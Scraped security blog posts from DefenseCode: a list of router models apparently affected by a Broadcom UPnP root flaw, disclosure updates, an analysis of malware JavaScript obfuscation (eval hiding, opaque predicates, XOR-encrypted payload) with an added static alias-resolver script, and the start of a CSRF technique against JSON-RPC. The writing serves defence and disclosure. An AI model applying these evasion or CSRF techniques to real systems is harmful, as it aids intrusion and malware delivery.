SIEMENS<br />
<br />
- alice.box<br />
<br />
<br />
<br />
Siemens<br />
<br />
- ADSL SL2-141<br />
<br />
- ADSL SL2-141-I<br />
<br />
- Gigaset SE515B<br />
<br />
- SL2-141-I<br />
<br />
<br />
<br />
SimpleTech<br />
<br />
- OdenShare<br />
<br />
- SimpleShare<br />
<br />
<br />
<br />
Sinus<br />
<br />
- 1054 DSL<br />
<br />
<br />
<br />
SmartLink<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
Sparklan<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
Speedport<br />
<br />
- 500V<br />
<br />
- W 500V<br />
<br />
<br />
<br />
Starbridge Networks<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Star-Net<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
STAR-NET<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
Sveasoft Inc.<br />
<br />
- Residential Gateway Device<br />
<br />
<br />
<br />
TARGA WR 500 VoIP<br />
<br />
- TARGA WR 500 VoIP<br />
<br />
<br />
<br />
Tecom<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
TeleWell Oy (http://www.telewell.fi)<br />
<br />
TeleWell Oy (http://www.telewell.fi) - TeleWell.gateway<br />
<br />
<br />
<br />
Telsey<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
TELUS<br />
<br />
- VSG1432<br />
<br />
<br />
<br />
Tenda<br />
<br />
- ADSL2/2+ Modem Router<br />
<br />
<br />
<br />
Tenda/Imex<br />
<br />
- W150D<br />
<br />
<br />
<br />
Tenda/lmex<br />
<br />
- ADSL2+ Ethernet Modem Router<br />
<br />
- ADSL Router<br />
<br />
- Gateway<br />
<br />
<br />
<br />
TOPTRONICS<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
TP-LINK<br />
<br />
- ADSL Router<br />
<br />
- 54M Wireless ADSL2+ router<br />
<br />
- ADSL2+ Modem Router<br />
<br />
- ADSL2+ Router<br />
<br />
- ADSL2+ Router Modem<br />
<br />
- ADSL Router<br />
<br />
- Wireless ADSL2+ Modem Router<br />
<br />
- Wireless ADSL2+ router<br />
<br />
- Wireless ADSL2+ Router<br />
<br />
- Wireless N ADSL2+ Modem Router TD-W8960N<br />
<br />
<br />
<br />
U.S. Robotics Corporation<br />
<br />
- Internet Gateway Device<br />
<br />
<br />
<br />
U.S. Robotics<br />
<br />
- USRobotics ADSL2+ Router<br />
<br />
- ADSL 4 Port Router<br />
<br />
- ADSL 4-Port Router<br />
<br />
- USR8561<br />
<br />
<br />
<br />
UTStarcom Inc.<br />
<br />
- UTStarcom ADSL2+ Modem Router<br />
<br />
<br />
<br />
UTstarcom Inc.<br />
<br />
- UTstarcom ADSL2+ Modem/Wireless Router<br />
<br />
- UTStarcom ADSL2+ Modem/Wireless Router<br />
<br />
- VSG1432-B101<br />
<br />
- VSG1435-B101<br />
<br />
<br />
<br />
WIN<br />
<br />
- eNet660S<br />
<br />
<br />
<br />
WorldNet<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
XAVi<br />
<br />
- DSL Router<br />
<br />
<br />
<br />
Zhone Technologies.<br />
<br />
- UPnP v1.0<br />
<br />
<br />
<br />
Zhone<br />
<br />
- Gateway<br />
<br />
- Wireless Gateway<br />
<br />
<br />
<br />
ZISA<br />
<br />
- ADSL Router<br />
<br />
<br />
<br />
ZTE<br />
<br />
- ADSL Router<br />
<br />
- Broadcom ADSL Router<br />
<br />
<br />
<br />
ZTE Corporation<br />
<br />
- ZXDSL 931 Series Device<br />
<br />
- Home Gateway<br />
<br />
- ZXDSL 531B<br />
<br />
<br />
<br />
ZyXEL Communication Crop.<br />
<br />
- P-870H-51A V2 UPnP<br />
<br />
- P-870H-51b UPnP<br />
<br />
- P-870H-53A V2 UPnP<br />
<br />
- P-870HN-51b UPnP<br />
<br />
- P-870HN-51D UPnP<br />
<br />
- P-870HN-53b UPnP<br />
<br />
- P-870HNU-51b<br />
<br />
- VSG1435-B101<br />
<br />
- Wireless Broadband Router<br />
<br />
- ZyXEL UPnP v1.0<br />
<br />
<br />
<br />
ZyXEL<br />
<br />
- P-660HN-51<br />
<br />
- P-870HN-53b<br />
<br />
- P-873HNU-51B<br />
<br />
- P-873HNUP-51B<br />
<br />
- Qwest TR-064 v1.0<br />
<br />
- VMG1312-B30A<br />
<br />
- VSG1432-B101<br />
<br />
- VSG1435-B101<br />
<br />
- ADSL Router<br />
<br />
- TR64 Router<br />
<br />
- UPnP Router<br />
<br />
- VDSL Router<br />
<br />
<br />
<br />
ZYXEL<br />
<br />
- ZyXEL VDSL Router<br />
<br />
- xDSL Router<br />
<div>
<br /></div>
Broadcom UPnP Remote Preauth Root Code Execution Vulnerability (2013-01-30)<br />
During the security evaluation of Cisco Linksys routers for a client, we discovered a critical security vulnerability that allows a remote unauthenticated attacker to execute arbitrary code with root privileges.<br />
Upon the initial vulnerability announcement a few weeks ago, a Cisco spokesman stated that only one router model is vulnerable, the WRT54GL.<br />
We have continued our research and found that, in fact, the same vulnerable firmware component is also used in at least two other Cisco Linksys models, the WRT54G3G and probably the WRT310N. There could be others.<br />
<br />
Moreover, the vulnerability turns out to be even more dangerous, since we have discovered that the same vulnerable firmware component is also used by many other big-brand router manufacturers and many smaller vendors.<br />
<br />
The vulnerability itself is located in the Broadcom UPnP stack, which is used by many router manufacturers that produce or have produced routers based on Broadcom chipsets.<br />
We have contacted them with the vulnerability details and expect patches soon.<br />
However, we would like to point out that we have sent more than 200 e-mails to various router manufacturers and various people, without much success.<br />
<br />
Some of the manufacturers contacted regarding this vulnerability are:<br />
- Broadcom<br />
- Asus<br />
- Cisco<br />
- TP-Link<br />
- Zyxel<br />
- D-Link<br />
- Netgear<br />
- US Robotics<br />
- and so on.<br />
<br />
Full vulnerability description is available here:<br />
<a href="http://www.defensecode.com/subcategory/advisories-28">http://www.defensecode.com/subcategory/advisories-28</a><br />
<br />
Regards,<br />Leon Juranic<br />
CEO<br />
DefenseCode<br />
DefenseCode Security Advisory (UPCOMING): Cisco Linksys Remote Preauth 0day Root Exploit Follow-Up (2013-01-17)<br />
Starting a few hours ago, we began a quick analysis of how many
Linksys models might be vulnerable. <br />
From what we can tell so far, at least one other (not just the
WRT54GL) Linksys model is probably vulnerable.
<br />
<br />
Moreover, during the analysis we discovered clues that network devices from other manufacturers might also contain the same vulnerability. We are still investigating.
<br />
<br />
Regarding the Cisco case, we are looking forward to the
vulnerability fix. In the meantime, we have again approached them about a few other potential vulnerabilities in the Linksys
equipment. <br />
<br />
<br />
Regards,<br />
Leon Juranic<br />
CEO<br />
DefenseCode<br />
<a class="moz-txt-link-freetext" href="http://www.defensecode.com/">http://www.defensecode.com/</a><br />
DefenseCode Security Advisory (UPCOMING): Cisco Linksys Remote Preauth 0day Root Exploit (2013-01-11)<div>
Story behind the vulnerability...</div>
<div>
<br /></div>
<div>
Months ago, we contacted Cisco about a remote preauth (root access) vulnerability that we had discovered in the default installation of their Linksys routers. We gave them a detailed vulnerability description along with a PoC exploit for the vulnerability.</div>
<div>
<br /></div>
<div>
They said that this vulnerability was already fixed in the latest firmware release... Well, not this particular vulnerability, since the latest official Linksys firmware, 4.30.14, and all previous versions are still vulnerable.</div>
<div>
<br /></div>
<div>
The exploit shown in this video has been tested on the Cisco Linksys WRT54GL, but other Linksys versions/models are probably also affected. Cisco Linksys is a very popular router line, with more than 70,000,000 routers sold. That's why we think this vulnerability deserves attention.</div>
<div>
<br /></div>
<div>
According to our vulnerability disclosure policy, the vulnerability details will be disclosed in the following 2 weeks on http://www.defensecode.com/, BugTraq and Full Disclosure. Due to the severity of this vulnerability, once again we would like to urge Cisco to fix this vulnerability.</div>
<div>
<br /></div>
<div>
The vulnerability is demonstrated in the following video:</div>
<div>
<a href="http://www.youtube.com/watch?v=cv-MbL7KFKE&hd=1">http://www.youtube.com/watch?v=cv-MbL7KFKE&hd=1</a></div>
<div>
<br /></div>
<div>
Kind Regards,</div>
<div>
DefenseCode</div>
Soon to be expected... (2012-11-23)<br />
Hi folks,<br />
<br />
We're working very hard on new stuff and security research, so very soon DefenseCode will release some interesting stuff... Like...<br />
<br />
- Cisco Linksys remote preauth 0day root exploit<br />
- Vulnerabilities in software from NASA<br />
- Free Internet tricks....<br />
- ThunderScan Source Code Security Analysis software for Android apps<br />
- Web Security Scanner<br />
- BlackTitan Internet Security with advanced JavaScript Malware analysis engine<br />
<br />
Stay tuned.. :)<br />
<br />
Regards,<br />
DefenseCode<br />
Vulnerabilities in WP E-Commerce plugin for WordPress (2012-11-12)<br />
DefenseCode released Security Advisory DC-2012-11-001 to address issues that affect the WordPress WP E-Commerce plugin, which has more than 2 million downloads and is one of the most popular plugins for WordPress. The advisory covers multiple vulnerabilities discovered during a security audit of the plugin. All vulnerabilities were discovered using DefenseCode's ThunderScan PHP web application source code security analyzer. The bugs found by ThunderScan are high-risk SQL injections and cross-site scripting, which an attacker could use to compromise the targeted system. DefenseCode has contacted the vendor, and the vulnerabilities are fixed in the latest WP e-Commerce release (3.8.9.1).<br />
<br />
You can find more details about the advisory <a href="http://www.defensecode.com/article/wordpress_wp_e-commerce_plugin_multiple_security_vulnerabilities_-30">here</a>.<br />
<br />
Soon, we’ll release a lot more vulnerabilities discovered by our ThunderScan software. Also, we’ll release a few interesting 0day vulnerabilities not related to web applications, so make sure that you’re subscribed to our RSS feed.<br />
<br />
Regards,<br />
DefenseCode<br />
Announcement: DefenseCode ThunderScan v1.1 - Web Application Source Code Security Analysis (2012-10-11)<br />
We are proud to present a new product for comprehensive Web
Application Security Scanning.<br />
DefenseCode ThunderScan v1.1 for Web Application Source Code
Security Analysis is available now.<br />
<br />
Demo run against Mutillidae v1.3 can be seen here:<br />
<a href="http://www.youtube.com/watch?v=dcml2stPYNM&hd=1">http://www.youtube.com/watch?v=dcml2stPYNM&hd=1</a><br />
<br />
DefenseCode ThunderScan products are designed for comprehensive security assessment of web application source code in order to discover critical security vulnerabilities that hackers could exploit to compromise web application security.<br />
<br />
More information about the product is available here:<br />
<a href="http://www.defensecode.com/subcategory/thunderscan-8">http://www.defensecode.com/subcategory/thunderscan-8</a><br />
<br />
ThunderScan v1.1 supported languages:<br />
- ASP.Net C#<br />
- PHP<br />
- Java/JSP<br />
- VB.Net<br />
- Classic ASP<br />
<br />
Thunderscan v1.1 will scan web applications for a wide range of
security vulnerabilities like:<br />
- SQL Injection<br />
- File Disclosure<br />
- Page Inclusion<br />
- Code Injection<br />
- Shell Command Execution<br />
- Cross Site Scripting<br />
- File Manipulation<br />
- Arbitrary File Upload<br />
- Dangerous Configuration Settings<br />
- Arbitrary Server Connection<br />
- XPATH Injection<br />
- LDAP Injection<br />
- HTTP Response Splitting<br />
- Information Leak<br />
- Mail Relay<br />
- Misc. Dangerous Functions<br />
- Dangerous File Extensions<br />
- And more<br />
<br />
<br />
ThunderScan v1.1 New Features:<br />
- Tainted input flow track interactive analysis<br />
- Automated discovery of custom input functions<br />
- Improved custom functions analysis<br />
- Improved filter detection<br />
- Custom filtering functions detection<br />
- Improved large multiline code handling<br />
- Improved input tracking across multiple functions<br />
- Fixed bug in XML reporting<br />
- Improved Java and C# class detection<br />
- Improved Java and C# class analysis<br />
- Advanced PHP static inclusion algorithm<br />
- Improved PHP PEAR tracking functions base<br />
- Added Java JSON-RPC support<br />
<br />
We are continuously working on improving our products and keeping them up to date so you can be sure that all the latest threats get detected.<br />
<br />
Kind Regards<br />
--<br />
DefenseCode Team<br />
<span style="color: #999999;">ThunderScan - Scan your Web
Application For Security Vulnerabilities<br />
</span><span style="color: #999999;"><a class="moz-txt-link-freetext" href="http://www.defensecode.com/subcategory/thunderscan-8">http://www.defensecode.com/subcategory/thunderscan-8</a></span><br />
Diving into recent 0day Javascript obfuscations (2012-10-07)<h2>
Introduction</h2>
<div>
<div>
One of the most common ways for an attacker to infect systems over the Internet is JavaScript. Typical web exploitation frameworks like Blackhole use polymorphic JavaScript as a personalized payload for every victim. By employing various obfuscations they are able to evade static signatures and reduce anti-virus detection rates.</div>
<div>
In this post we will analyze one such JavaScript obfuscator, Dadong's JSXX, which was used to obfuscate the payload of a recent Java 0day exploit (CVE-2012-4681) found in the wild. The vulnerability has since been patched by Oracle, and it is recommended that you apply the security patch to ensure maximum protection.<br />
DefenseCode <a href="http://www.defensecode.com/subcategory/blacktitan-10">BlackTitan Internet Security </a>customers are protected from the described exploit by <a href="http://www.defensecode.com/subcategory/blacktitan-10">BlackTitan </a>malware signatures BTSIG9612, BTSIG9613 and BTSIG9615.<br />
<br /></div>
</div>
<h2>
Analysis of Dadong JSXX obfuscated payload</h2>
<div>
Let's first take a look at the fully obfuscated JavaScript code generated by the attacker. The following code is generated for each visit to the web page serving the exploit; it is responsible for exploiting the Java vulnerability and installing malicious software:<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeRg3Ckw67N2ihx-0HtkvB4hDZhpY4nEAXNftXn4QnXEAvJXnS0hqC17YGbVlOtqtALwfUd_5ZPwmStATfUYAaTXx_xkr2RdiRy-8e9XoNvaHvdMyeSMTxhRj_D4UhYlrH98zd53__drc/s1600/dc_js.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeRg3Ckw67N2ihx-0HtkvB4hDZhpY4nEAXNftXn4QnXEAvJXnS0hqC17YGbVlOtqtALwfUd_5ZPwmStATfUYAaTXx_xkr2RdiRy-8e9XoNvaHvdMyeSMTxhRj_D4UhYlrH98zd53__drc/s1600/dc_js.PNG" /></a></div>
<div>
<br /></div>
<div>
<div>
The first thing we notice is that this code was not designed to be easy to understand and analyze. In fact, it is designed to thwart static analysis and automated deobfuscation tools so that it can stay undetected longer.</div>
<div>
While looking at the obfuscated code several things become obvious:</div>
</div>
<div>
<div>
<ul>
<li>Code alignment and flow structure is not preserved</li>
<li>Original variable and function names are replaced by random strings</li>
<li>Various additional obfuscations are introduced to further deter analysis</li>
</ul>
</div>
</div>
<div>
To get a better understanding of the code we will tackle each of these observations in turn.<br />
<br /></div>
<h3>
Recovering code alignment and flow structure</h3>
<div>
Most development editors and environments have basic code prettifying functionality that lets you format code into a more readable structure. Malzilla, described as a "malware hunting tool", has the ability to format obfuscated JavaScript code into a much nicer layout. Some manual formatting or regex replacements may be necessary for the final touches until we are fully satisfied with the result. Once we are satisfied with the code layout we can proceed to the next step.<br />
<br /></div>
<h3>
Recovering function and variable names</h3>
<div>
<div>
While analyzing the code we uncover the semantics of functions and variables and should rename them as we advance through the code. Every renamed variable or function speeds up further analysis and reduces the time needed to cover all the code. Names should be concise and carry a clear meaning, so that all subsequent encounters of that variable or function are quickly recognized and can be skipped.</div>
<div>
The following is an example of code before and after the renaming process.</div>
<div>
Obfuscated code:</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6n2VmbZQN42QrXgETBce6mMPxECbEcSndiGblWEz1pYxCiBC5E4apzOJ375V-Z_HUJ8GMuFJ6XhGmiUo2RaSarfSXeOYlFTHwMY6kDkEfx22xt3-5Xo69wRa-dJdghIbMiWAHvL_He8w/s1600/blog1pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6n2VmbZQN42QrXgETBce6mMPxECbEcSndiGblWEz1pYxCiBC5E4apzOJ375V-Z_HUJ8GMuFJ6XhGmiUo2RaSarfSXeOYlFTHwMY6kDkEfx22xt3-5Xo69wRa-dJdghIbMiWAHvL_He8w/s640/blog1pic.png" width="640" /></a></div>
</div>
<div>
<br />
Renamed code:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsuXBazB6VJ09zH6p5aFDl4s-PsKssRf_EwY2dbeWBpmdB6RzzScH8QPIaJgNm0Z65OEkuyZ07W9yMHtsLsfgW26o2tcv7GTNNdBavZwkdXUZI-bx0_yfQfbD2ASIlROacB0L5dy2oxhc/s1600/blog2pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsuXBazB6VJ09zH6p5aFDl4s-PsKssRf_EwY2dbeWBpmdB6RzzScH8QPIaJgNm0Z65OEkuyZ07W9yMHtsLsfgW26o2tcv7GTNNdBavZwkdXUZI-bx0_yfQfbD2ASIlROacB0L5dy2oxhc/s640/blog2pic.png" width="640" /></a></div>
<br />
<br />
<h3>
Common JavaScript obfuscations</h3>
</div>
</div>
<div>
<div>
After the code has been properly formatted we can see the additional obfuscations introduced into it. Let's now examine common JavaScript obfuscations in this sample.<br />
<br /></div>
<h3>
Hiding use of eval()</h3>
</div>
<div>
<div>
One of the most commonly used JavaScript obfuscations is using the eval() function to run code stored as a string in a variable. This obfuscator is no different and uses several different eval() obfuscations.</div>
<div>
To hide uses of eval(), the code assigns the function to various randomly named variables in an attempt to disguise its usage. The following code snippet shows several steps used to hide eval() from static analysis.<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX5kjJB-JnTwfgcLgJBvdNIMxnKORuEQhVxbLV_P5TzgpCZDgg5SqMIsQ0dLE3eeU_3jzxU54CW45E-Fe-64AxAskXExNel_48gd0SMqM2zgjorqOn6TZjw0TIoW76mGs3p8rQhoDptVo/s1600/blog3pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX5kjJB-JnTwfgcLgJBvdNIMxnKORuEQhVxbLV_P5TzgpCZDgg5SqMIsQ0dLE3eeU_3jzxU54CW45E-Fe-64AxAskXExNel_48gd0SMqM2zgjorqOn6TZjw0TIoW76mGs3p8rQhoDptVo/s640/blog3pic.png" width="640" /></a></div>
<br />
This technique of hiding functions is not reserved for eval(); it is typically used to obfuscate the use of every function that could otherwise be used to statically identify malicious code.</div>
<div>
A slightly more advanced example of assigning eval to a variable is using string transformations to build the "eval" string. One such example is inserting junk characters between the letters of eval and then removing them dynamically with a regular expression. With this simple rule it is possible to generate polymorphic eval assignments.</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVLlis8uCZMBxyPVgWpJod5koKzW5FPkwFKDxIV8-jDPBfyY96O1-lM0SIHIR4vwJTmQHl9pszz6A1QdFeDRDaQTS26WSUaHsA4cHj6n1CWTk5fkkyMEMt1xCitFc25MtLlUK_tAM0-Y/s1600/blog4pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVLlis8uCZMBxyPVgWpJod5koKzW5FPkwFKDxIV8-jDPBfyY96O1-lM0SIHIR4vwJTmQHl9pszz6A1QdFeDRDaQTS26WSUaHsA4cHj6n1CWTk5fkkyMEMt1xCitFc25MtLlUK_tAM0-Y/s640/blog4pic.png" width="640" /></a></div>
<br /></div>
<div>
The previous expression removes all characters from the string except those listed in the regular expression, which is equivalent to the following:</div>
<div>
eval2=eval('eval');<br />
<br /></div>
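The alias-hiding patterns above can be resolved statically. As an added example, not code from the post or from the analysed sample, the following line-based resolver (all names and sample lines are constructed) folds the junk-character replace(), literal concatenation and eval('eval') forms into the identifier they produce and reports which aliases end up pointing at a sensitive function, without executing anything:

```javascript
// Added example (not from the original post): resolve eval-hiding aliases
// statically. Heuristic and line-based; it does not parse JavaScript.
// Names, regexes and the SAMPLE script below are constructed.

// Functions an analyst wants to locate once the aliases are resolved.
const SENSITIVE = new Set(["eval", "Function", "unescape", "document.write"]);

// A: x = "e#v#a#l".replace(/#/g, "")   (junk stripped by a regex)
const RE_JUNK = /^(?:(?:var|let|const)\s+)?(\w+)\s*=\s*(["'])(.*?)\2\s*\.replace\(\s*\/((?:\\\/|[^\/])+)\/(\w*)\s*,\s*(["'])\6\s*\)\s*;?$/;
// B: x = "ev" + 'a' + "l"               (literal concatenation; no '+' inside literals)
const RE_CONCAT = /^(?:(?:var|let|const)\s+)?(\w+)\s*=\s*((?:["'][^"']*["']\s*\+\s*)+["'][^"']*["'])\s*;?$/;
// C: x = y("name")                      (eval('eval') returns eval itself)
const RE_CALL = /^(?:(?:var|let|const)\s+)?(\w+)\s*=\s*(\w+)\(\s*(["'])(\w+)\3\s*\)\s*;?$/;
// D: x = y                              (plain alias copy)
const RE_COPY = /^(?:(?:var|let|const)\s+)?(\w+)\s*=\s*(\w+)\s*;?$/;

// Walk the script line by line and build alias -> resolved identifier.
function resolveAliases(src) {
  const aliases = new Map();
  const canon = (name) => aliases.get(name) || name; // follow an earlier alias
  for (const raw of src.split("\n")) {
    const stmt = raw.trim();
    if (!stmt) continue;
    let m;
    if ((m = RE_JUNK.exec(stmt))) {
      // Apply the sample's own regex to its own string; no code is evaluated.
      const junk = new RegExp(m[4], m[5]);
      aliases.set(m[1], canon(m[3].replace(junk, "")));
    } else if ((m = RE_CONCAT.exec(stmt))) {
      const joined = m[2].split("+").map((p) => p.trim().slice(1, -1)).join("");
      aliases.set(m[1], canon(joined));
    } else if ((m = RE_CALL.exec(stmt))) {
      // Only eval("ident") (or an alias of eval) yields the named function.
      if (canon(m[2]) === "eval") aliases.set(m[1], canon(m[4]));
    } else if ((m = RE_COPY.exec(stmt))) {
      if (aliases.has(m[2])) aliases.set(m[1], aliases.get(m[2]));
    }
  }
  return aliases;
}

// Report every alias that ultimately names a sensitive function.
function findSensitiveAliases(src) {
  const hits = [];
  for (const [alias, target] of resolveAliases(src)) {
    if (SENSITIVE.has(target)) hits.push({ alias, target });
  }
  return hits;
}

// Constructed sample in the style of the snippet above (not the real payload).
const SAMPLE = [
  'var a1 = "e#v#a#l".replace(/#/g, "");',
  "var b2 = 'ev' + 'a' + \"l\";",
  'var c3 = a1("eval");',
  "var d4 = c3;",
  'var n5 = "do#cu#ment.wr#ite".replace(/#/g, "");',
  'var ok6 = "he-llo".replace(/-/g, "");',
].join("\n");

console.log(findSensitiveAliases(SAMPLE));
```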
<h3>
Opaque predicates</h3>
</div>
<div>
<div>
An opaque predicate is an expression whose outcome is predetermined to always be true or false. The simplest example is the expression if( true ). Malware authors use opaque predicates to thwart static analysis tools by constructing expressions that are not simple to determine without evaluating them inside the targeted environment. Dadong JSXX uses mathematical functions to build opaque predicates, which are then used in loop conditions. Let's examine one of the expressions used as an opaque predicate:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirtBSx4KrEgVozo8LEjVBmcpGvn0vJDqT1iWkQXAGEQyurIxNeSKLkP3eBf6QO4zJZxTFL9QQ5wc8ON5GaW10cF-6zr5l8VOk3RbadwikogaxqE1q98ZkHW5i6esQWWTMOxcDSZJMsoQ0/s1600/blog5pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirtBSx4KrEgVozo8LEjVBmcpGvn0vJDqT1iWkQXAGEQyurIxNeSKLkP3eBf6QO4zJZxTFL9QQ5wc8ON5GaW10cF-6zr5l8VOk3RbadwikogaxqE1q98ZkHW5i6esQWWTMOxcDSZJMsoQ0/s640/blog5pic.png" width="640" /></a></div>
<br /></div>
<div>
We can divide the expression into groups and evaluate each of the logical expressions:</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFGQ-2XVFlzWRBq1CHHsSdVYU1pkIHyVMdH0HzpZ_kQvFnLaMBVIZfUy3Sqvr_lfT4X6bL5BX6MBIXAv79mo9Ps7k3h5JowICr8zZfrDGz200lTuXJWhzV2-4aHlHOP7s4S8YZ0q-1PQ/s1600/blog6pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFGQ-2XVFlzWRBq1CHHsSdVYU1pkIHyVMdH0HzpZ_kQvFnLaMBVIZfUy3Sqvr_lfT4X6bL5BX6MBIXAv79mo9Ps7k3h5JowICr8zZfrDGz200lTuXJWhzV2-4aHlHOP7s4S8YZ0q-1PQ/s1600/blog6pic.png" /></a></div>
<br /></div>
<div>
Inserting the results into the original expression we have:</div>
<div>
~(0 | ( 1 | 0 & 0)) = ~( 0 | 1 ) = ~1 = 0</div>
<div>
<br /></div>
<div>
So the previous complicated expression will always evaluate to 0 and can effectively be rewritten as:</div>
<div>
fExpression_eq0 = 0;</div>
<div>
<br /></div>
<div>
Chaining multiple opaque predicates in different variables makes it harder to statically determine what actually is an opaque predicate and what is a non-reducible expression.<br />
<br /></div>
<h3>
Self-referencing decryption</h3>
</div>
<div>
<div>
One very interesting method against code formatting is self-referencing decryption. Let's examine the following code snippet:<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvulzb38vXyMBhNNg9EwLOLJ-lU0zPWYvHqTUjJQHrVIfKVo8uV5Vx2S-CTfk1xpbXT2fjAB_8Kl1Nh2VOC2QJXfUFdtZTS-i3d-oo6LLRC6jJAKDyk5kkRsWbjHIhvGmBwmglCX40rmw/s1600/blog7pic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvulzb38vXyMBhNNg9EwLOLJ-lU0zPWYvHqTUjJQHrVIfKVo8uV5Vx2S-CTfk1xpbXT2fjAB_8Kl1Nh2VOC2QJXfUFdtZTS-i3d-oo6LLRC6jJAKDyk5kkRsWbjHIhvGmBwmglCX40rmw/s640/blog7pic.png" width="640" /></a></div>
<br /></div>
<div>
Rewritten for easier understanding:<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjawAdfPgtnDL4cxn3WXfKktbhX2bkIU2a8mz9BCoaAIiYJzsLMDVvj2yaVn4kIk4obLwQqKCipboshfWg2Akm1WfNjeDArnnzs1fvbbM67WoW73mj60sHacT97IahfMBga7914RnD_UUc/s1600/blog8pic.png" imageanchor="1" style="display: inline !important; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjawAdfPgtnDL4cxn3WXfKktbhX2bkIU2a8mz9BCoaAIiYJzsLMDVvj2yaVn4kIk4obLwQqKCipboshfWg2Akm1WfNjeDArnnzs1fvbbM67WoW73mj60sHacT97IahfMBga7914RnD_UUc/s640/blog8pic.png" width="640" /></a></div>
</div>
<div>
<br /></div>
<div>
aCodeAsString, originally named sBtEp6, references itself inside the string that is evaluated, so any modification or formatting of aCodeAsString will result in unsuccessful decryption of the final payload, effectively preventing any modification of the code.<br />
<br /></div>
<h3>
Encrypted code</h3>
</div>
<div>
<div>
All the previous obfuscations serve to make static decryption of the final malicious payload hard. The variable vlWWlBt3 from the original obfuscated snippet contains hex-encoded, encrypted JavaScript code. Since the decryption algorithm has to be contained in the script, the previous obfuscations make sure that detecting and analyzing that algorithm is complicated. The encryption algorithm is XOR based, and the decryption key is generated from the self-referencing string, so it implements a simple kind of tamper-proof protection. The decrypted code is then simply passed to eval() and executed inside the browser.</div>
<div>
The final functionality contains the malicious payload, which launches the Java exploit and installs malware on the compromised system.<br />
<br /></div>
<h2>
Summary</h2>
<div>
The JavaScript language, with its loose syntax, offers attackers a variety of ways to generate polymorphic wrappers for the malicious payload, which effectively hinders traditional anti-malware signatures. By understanding the techniques employed by malware authors we can provide the best protection to our customers with <a href="http://www.defensecode.com/subcategory/blacktitan-10">BlackTitan Internet Security</a>.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<br />
<h2>
Cross-Site Request Forgery against applications that use JSON RPC</h2>
Published 2012-09-28, updated 2012-10-07.<br />
<br />
Cross-site request forgery is a common and well-known web application vulnerability. Most of the time, exploiting these vulnerabilities is relatively straightforward: you just need to set up a proper HTML form, or even use a simple URL. Sometimes, however, things get a little more complicated. One such case is when the targeted application uses JSON-RPC.<br />
<br />
JSON-RPC is a simple mechanism for issuing a remote procedure call using JSON notation over HTTP. When issuing a JSON-RPC request, the browser sends a POST request to some URL, and the body of the request is JSON-encoded data, like this:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">{"jsonrpc": "2.0", "method": "subtract", "params": [42, 23], "id": 1}
</span><br />
<br />
More on JSON-RPC can be found <a href="http://en.wikipedia.org/wiki/JSON-RPC">here</a>.<br />
<br />
Now, the problem is how to create a CSRF attack against an application that expects these kinds of POST requests. Using Ajax (XMLHttpRequest) will not help, since the browser will check for permission to make a cross-domain request (using an OPTIONS request).<br />
<br />
We at DefenseCode would like to share a little trick that we use in our penetration tests. You can use it to construct an HTML form that forces the browser to submit a proper JSON-RPC request to the target application.<br />
<br />
The problem with HTML forms is that input elements need to have a name; without a name, the browser will not send the data even if you specify a value for the element. To get around this, you can set only the name of the input element, without a value. For example:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><input name="test_name" />
</span><br />
<br />
